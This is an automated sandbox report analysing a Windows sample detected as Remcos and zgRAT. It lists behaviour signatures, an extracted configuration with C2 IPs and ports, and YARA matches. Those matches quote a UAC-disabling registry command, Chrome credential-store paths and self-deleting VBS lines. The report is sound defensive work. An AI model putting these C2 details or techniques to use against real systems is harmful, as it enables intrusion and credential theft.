Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:882705
MD5:58a91896eaf6efe03ffe6ebb7b731792
SHA1:e3ec7807b22e91e887dd1bc752c426041607216f
SHA256:dc984e3a8de291d49bab5940b8f8047d2a7d8f0dab4231342c36edcee9cbb92e
Tags:NETexeMSILx64zgRAT
Infos:

Detection

Remcos, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected UAC Bypass using CMSTP
Contains functionality to bypass UAC (CMSTPLUA)
Multi AV Scanner detection for submitted file
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Sigma detected: Remcos
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Machine Learning detection for sample
Allocates memory in foreign processes
Contains functionality to modify clipboard data
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Binary contains a suspicious time stamp
Contains functionality to retrieve information about pressed keystrokes
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3852 cmdline: C:\Users\user\Desktop\file.exe MD5: 58A91896EAF6EFE03FFE6EBB7B731792)
    • aspnet_compiler.exe (PID: 6780 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • aspnet_compiler.exe (PID: 6768 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • aspnet_compiler.exe (PID: 5828 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • aspnet_compiler.exe (PID: 5796 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
zgRATNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "127.0.0.1:55433:1185.65.134.166:55433:110.11.0.5:55433:145.128.234.54:55433:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-UQ90W9", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    file.exeMALWARE_Win_zgRATDetects zgRATditekSHen
    • 0x33851:$s1: file:///
    • 0x337ad:$s2: {11111-22222-10009-11112}
    • 0x337e1:$s3: {11111-22222-50001-00000}
    • 0x2f33d:$s4: get_Module
    • 0x2ba2e:$s5: Reverse
    • 0x2baeb:$s6: BlockCopy
    • 0x2c1ba:$s7: ReadByte
    • 0x33865:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
          • 0x643b8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x6434c:$s1: CoGetObject
          • 0x64360:$s1: CoGetObject
          • 0x6437c:$s1: CoGetObject
          • 0x6e15e:$s1: CoGetObject
          • 0x6430c:$s2: Elevation:Administrator!new:
          00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6a470:$a1: Remcos restarted by watchdog!
          • 0x6a9d4:$a3: %02i:%02i:%02i:%03i
          Click to see the 10 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            4.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              4.2.aspnet_compiler.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x633b8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x6334c:$s1: CoGetObject
              • 0x63360:$s1: CoGetObject
              • 0x6337c:$s1: CoGetObject
              • 0x6d15e:$s1: CoGetObject
              • 0x6330c:$s2: Elevation:Administrator!new:
              4.2.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x69470:$a1: Remcos restarted by watchdog!
              • 0x699d4:$a3: %02i:%02i:%02i:%03i
              4.2.aspnet_compiler.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
              • 0x634c4:$str_a1: C:\Windows\System32\cmd.exe
              • 0x63440:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x63440:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x63938:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x64168:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x63534:$str_b2: Executing file:
              • 0x645b4:$str_b3: GetDirectListeningPort
              • 0x63f58:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x640d8:$str_b7: \update.vbs
              • 0x6355c:$str_b9: Downloaded file:
              • 0x63548:$str_b10: Downloading file:
              • 0x635ec:$str_b12: Failed to upload file:
              • 0x6457c:$str_b13: StartForward
              • 0x6459c:$str_b14: StopForward
              • 0x64030:$str_b15: fso.DeleteFile "
              • 0x63fc4:$str_b16: On Error Resume Next
              • 0x64060:$str_b17: fso.DeleteFolder "
              • 0x635dc:$str_b18: Uploaded file:
              • 0x6359c:$str_b19: Unable to delete:
              • 0x63ff8:$str_b20: while fso.FileExists("
              • 0x63a71:$str_c0: [Firefox StoredLogins not found]
              Click to see the 18 entries

              Sigma Signatures

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: B8 44 BD 83 D8 99 C8 1A 1F B1 2D B6 25 A1 5D 8A 03 5A B2 9B E4 8C 13 84 AA 33 63 EB 80 AF 7A 48 CB F5 21 D2 59 12 53 78 41 FD 3C 3E FC E0 99 D2 EF C8 AE 2A AB A8 F5 EF FE 5B F1 7F 36 AD 4B 29 AC 6A 0B 2C 7E 19 B1 0F E4 48 4F A9 3D 87 DA 03 93 BB 9F DA ED 8E A0 DD CC E5 F1 B7 02 19 23 C1 63 53 44 B9 17 19 14 64 43 E6 AD BC 04 35 F1 20 6B 9F 4E B8 0E 8E 0E 69 39 51 E0 75 1C BD 62 DC C2 F7 D3 DD , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 5796, TargetObject: HKEY_CURRENT_USER\Software\Rmc-UQ90W9\exepath

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "127.0.0.1:55433:1185.65.134.166:55433:110.11.0.5:55433:145.128.234.54:55433:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-UQ90W9", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 35%
              Source: file.exeVirustotal: Detection: 46%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTR
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00432142 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_00432142
              Source: file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTR

              Privilege Escalation

              barindex
              Contains functionality to bypass UAC (CMSTPLUA)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00406B71 _wcslen,CoGetObject,4_2_00406B71
              Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: CEMENT.pdb source: file.exe, 00000000.00000002.567234773.00000177EB320000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.564438533.000001778003B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: NBNNhH873.pdb source: file.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0044D0F9 FindFirstFileExA,4_2_0044D0F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040B0AA FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040B2B1 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040B2B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00418650 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00418650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040B8C7 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_2_0040B8C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00408909 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00408909
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0041AC0A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_2_0041AC0A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00408D1B __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00408D1B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00407E80 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_2_00407E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00406EB0 FindFirstFileW,FindNextFileW,4_2_00406EB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040730B SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_0040730B

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 127.0.0.1
              Source: Joe Sandbox ViewASN Name: ESAB-ASSE ESAB-ASSE
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: global trafficTCP traffic: 192.168.2.4:49693 -> 185.65.134.166:55433
              Source: global trafficTCP traffic: 192.168.2.4:49698 -> 45.128.234.54:55433
              Source: unknownTCP traffic detected without corresponding DNS query: 185.65.134.166
              Source: unknownTCP traffic detected without corresponding DNS query: 185.65.134.166
              Source: unknownTCP traffic detected without corresponding DNS query: 185.65.134.166
              Source: unknownTCP traffic detected without corresponding DNS query: 45.128.234.54
              Source: unknownTCP traffic detected without corresponding DNS query: 45.128.234.54
              Source: unknownTCP traffic detected without corresponding DNS query: 45.128.234.54
              Source: unknownTCP traffic detected without corresponding DNS query: 45.128.234.54
              Source: unknownTCP traffic detected without corresponding DNS query: 45.128.234.54
              Source: unknownTCP traffic detected without corresponding DNS query: 45.128.234.54
              Source: unknownTCP traffic detected without corresponding DNS query: 45.128.234.54
              Source: unknownTCP traffic detected without corresponding DNS query: 45.128.234.54
              Source: unknownTCP traffic detected without corresponding DNS query: 45.128.234.54
              Source: unknownTCP traffic detected without corresponding DNS query: 45.128.234.54
              Source: unknownTCP traffic detected without corresponding DNS query: 45.128.234.54
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/j
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.814983139.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F10000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: file.exe, 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp1
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp2C9DCABD6423689A465F00D4F
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpESS
              Source: aspnet_compiler.exe, 00000004.00000002.814983139.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpf
              Source: aspnet_compiler.exe, 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gples8
              Source: aspnet_compiler.exe, 00000004.00000002.814983139.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000003.658074028.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gprol
              Source: unknownDNS traffic detected: queries for: geoplugin.net
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004255BC recv,4_2_004255BC
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to modify clipboard data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00415802 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_00415802
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00415802 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_00415802
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_004099E3 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,4_2_004099E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00415802 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_00415802

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.814760961.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: file.exe, type: SAMPLEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.0.file.exe.177e97b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 0.2.file.exe.177e97b0000.3.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.file.exe.17793a03e98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000000.00000002.564591902.0000017793375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: aspnet_compiler.exe PID: 5796, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: file.exe, type: SAMPLEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.file.exe.17793a03e98.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.0.file.exe.177e97b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 0.2.file.exe.177e97b0000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
